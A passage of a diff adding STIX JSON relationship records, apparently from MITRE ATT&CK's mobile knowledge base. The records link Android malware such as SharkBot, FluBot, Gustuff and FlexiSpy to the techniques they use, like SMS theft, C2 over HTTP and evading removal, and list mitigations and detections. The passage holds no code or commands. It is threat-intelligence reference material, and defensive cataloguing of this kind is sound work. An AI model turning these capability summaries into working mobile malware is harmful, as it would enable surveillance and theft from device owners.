"modified": "2022-04-05T17:14:08.267Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "target_ref": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3b0cb886-dabc-4622-b91f-3851e2a71bf2", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:02:40.717Z", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) used HTTP uploads to a URL as a command and control mechanism.(Citation: Kaspersky-WUC)", + "relationship_type": "uses", + "source_ref": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fe794ba6-42be-4d42-a16f-a41473874331", + "created": "2022-03-30T15:08:13.679Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android-VerifiedBoot", + "url": "https://source.android.com/security/verifiedboot/", + "description": "Android. (n.d.). Verified Boot. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android Verified Boot can detect unauthorized modifications made to the system partition, which could lead to execution flow hijacking.(Citation: Android-VerifiedBoot) ", + "modified": "2022-03-30T15:08:13.679Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "target_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--eb58117c-5803-4f72-a499-5fa888a9a7a5", + "created": "2022-04-06T15:47:06.163Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T15:47:06.163Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--939808a7-121d-467a-b028-4441ee8b7cee", + "target_ref": "attack-pattern--c6a146ae-9c63-4606-97ff-e261e76e8380", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1c67b72f-7389-4c21-9347-2b1bba07aaaf", + "created": "2023-02-06T18:59:46.976Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:12:28.993Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can collect device IP address and SIM information.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2e913583-123a-47af-8872-98fc12ab4a6a", + "type": "relationship", + "created": "2020-11-24T17:55:12.846Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.846Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can send SMS messages.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5de0caa8-81f8-453c-b70c-a74e7ea9e5c2", + "created": "2022-03-30T19:12:31.481Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T19:12:31.481Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee", + "target_ref": "attack-pattern--b7c0e45f-0206-4f75-96e7-fe7edad3aaff", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0e8607f6-daab-44df-b167-105403a4ef41", + "created": "2023-01-18T19:57:33.986Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:39:39.355Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use the “Direct Reply” feature of Android to automatically reply to notifications with a message provided by C2.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b37ebb4e-0536-4de0-8e00-7b3d942a02b7", + "created": "2023-03-20T15:33:34.181Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:33:34.181Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cf4fe189-58cf-42aa-89c7-75bd0a83a263", + "created": "2023-03-15T16:23:59.107Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-15T16:23:59.107Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456", + "target_ref": "attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--48854999-1c12-4454-bb7c-051691a081f9", + "created": "2022-03-28T19:25:49.640Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Ensure Verified Boot is enabled on devices with that capability.", + "modified": "2022-03-28T19:25:49.640Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5d2a3a9f-2467-4ac6-ab64-ffe91ec584da", + "type": "relationship", + "created": "2021-09-24T14:52:41.308Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2021-09-24T14:52:41.308Z", + "description": " [Monokle](https://attack.mitre.org/software/S0407) can hook itself to appear invisible to the Process Manager.(Citation: Lookout-Monokle) ", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--ccde43e4-78f9-4f32-b401-c081e7db71ea", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--08a43019-d393-451f-a23c-2dfa17ec40b2", + "created": "2023-01-18T19:15:24.775Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:51:07.963Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can steal incoming SMS messages and send SMS messages from compromised devices. (Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2bedbf86-2ef0-45bf-950d-b9d072c03bdc", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:37:02.853Z", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) stole call logs.(Citation: Kaspersky-WUC)", + "relationship_type": "uses", + "source_ref": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--96569099-db95-4f3c-8ded-6d9cf023e55e", + "created": "2019-09-03T20:08:00.717Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": " [Gustuff](https://attack.mitre.org/software/S0406) can use SMS for command and control from a defined admin phone number.(Citation: Talos Gustuff Apr 2019) ", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a04ae7d7-1500-49c9-bada-1a75a8670f5c", + "created": "2019-11-21T19:16:34.820Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "CheckPoint SimBad 2019", + "url": "https://research.checkpoint.com/simbad-a-rogue-adware-campaign-on-google-play/", + "description": "Elena Root, Andrey Polkovnichenko. (2019, March 13). SimBad: A Rogue Adware Campaign On Google Play. Retrieved November 21, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[SimBad](https://attack.mitre.org/software/S0419) generates fraudulent advertising revenue by displaying ads in the background and by opening the browser and displaying ads.(Citation: CheckPoint SimBad 2019)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--f79c01eb-2954-40d8-a819-00b342f47ce7", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2793d721-df10-4621-8387-f3342def59a1", + "created": "2022-03-30T18:14:36.786Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "On iOS, the `allowEnterpriseAppTrust` and `allowEnterpriseAppTrustModification` configuration profile restrictions can be used to prevent users from installing apps signed using enterprise distribution keys. ", + "modified": "2022-03-30T18:14:36.786Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--98a4a746-e7bf-494c-9ee3-584403d76d3e", + "created": "2023-02-28T20:34:18.504Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:12:45.147Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can use HTTP POST requests on port 80 for communicating with its C2 server.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--049c39ab-c036-457a-9b8f-4318416658b8", + "created": "2022-03-30T19:54:24.468Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "A locked bootloader could prevent unauthorized modifications of protected operating system files. ", + "modified": "2022-03-30T19:55:15.724Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--38962b26-7cbe-4761-8b4f-50a022167c4d", + "created": "2019-09-03T20:08:00.708Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Gustuff](https://attack.mitre.org/software/S0406) checks for antivirus software contained in a predefined list.(Citation: Talos Gustuff Apr 2019)", + "modified": "2022-04-15T16:55:56.825Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--51757971-17ac-40c3-bae7-78365579db49", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro-Obad", + "description": "Veo Zhang. (2013, June 13). Cybercriminals Improve Android Malware Stealth Routines with OBAD. Retrieved December 9, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:02:27.188Z", + "description": "[OBAD](https://attack.mitre.org/software/S0286) abuses device administrator access to make it more difficult for users to remove the application.(Citation: TrendMicro-Obad)", + "relationship_type": "uses", + "source_ref": "malware--ca4f63b9-a358-4214-bb26-8c912318cfde", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1284f6fe-d352-415c-9479-82141524380a", + "created": "2022-03-30T18:06:48.250Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Typically, insecure or malicious configuration settings are not installed without the user's consent. Users should be advised not to install unexpected configuration settings (CA certificates, iOS Configuration Profiles, Mobile Device Management server provisioning). ", + "modified": "2022-03-30T18:06:48.250Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--79cb02f4-ac4e-4335-8b51-425c9573cce1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f58d3fc4-e0a2-4924-884d-85d7c8f00b8a", + "created": "2023-03-20T18:39:10.113Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:39:10.113Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--acf8fd2a-dc98-43b4-8d37-64e10728e591", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cc345ae4-0d60-4f21-98b3-596c15118745", + "created": "2023-02-06T19:42:46.814Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:38:03.367Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can send SMS messages.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6c35f99c-153d-4023-a29a-821488ce5418", + "type": "relationship", + "created": "2020-04-08T15:41:19.383Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "modified": "2020-04-08T15:41:19.383Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can collect a list of installed applications to compare to a list of targeted applications.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a20493e1-4699-405d-a291-c28aae8ed737", + "created": "2022-04-18T16:53:24.617Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Wandera-RedDrop", + "url": "https://www.wandera.com/reddrop-malware/", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[RedDrop](https://attack.mitre.org/software/S0326) uses ads or other links within websites to encourage users to download the malicious apps using a complex content distribution network (CDN) and series of network redirects. [RedDrop](https://attack.mitre.org/software/S0326) also downloads additional components (APKs, JAR files) from different C2 servers.(Citation: Wandera-RedDrop) ", + "modified": "2022-04-20T16:33:23.507Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "target_ref": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00dc2b34-1b74-4dae-b6e4-b676528d6341", + "type": "relationship", + "created": "2019-07-16T14:33:12.085Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Triada June 2019", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019." + } + ], + "modified": "2020-04-27T16:52:49.480Z", + "description": "[Triada](https://attack.mitre.org/software/S0424) utilizes a backdoor in a Play Store app to install additional trojanized apps from the Command and Control server.(Citation: Google Triada June 2019)", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bf19207a-ac71-436d-8ef4-4ab059b533c8", + "created": "2019-09-04T15:38:56.721Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "FortiGuard-FlexiSpy", + "description": "K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. Retrieved September 10, 2019.", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:48:43.225Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) uses root access to establish reboot hooks to re-install the application from `/data/misc/adn`.(Citation: FortiGuard-FlexiSpy) At boot, [FlexiSpy](https://attack.mitre.org/software/S0408) spawns daemons for process monitoring, call monitoring, call managing, and system.(Citation: FortiGuard-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--96490f73-d8ef-4c6b-9a3a-3c66fc963306", + "type": "relationship", + "created": "2020-05-07T15:33:32.778Z", + "created_by_ref": 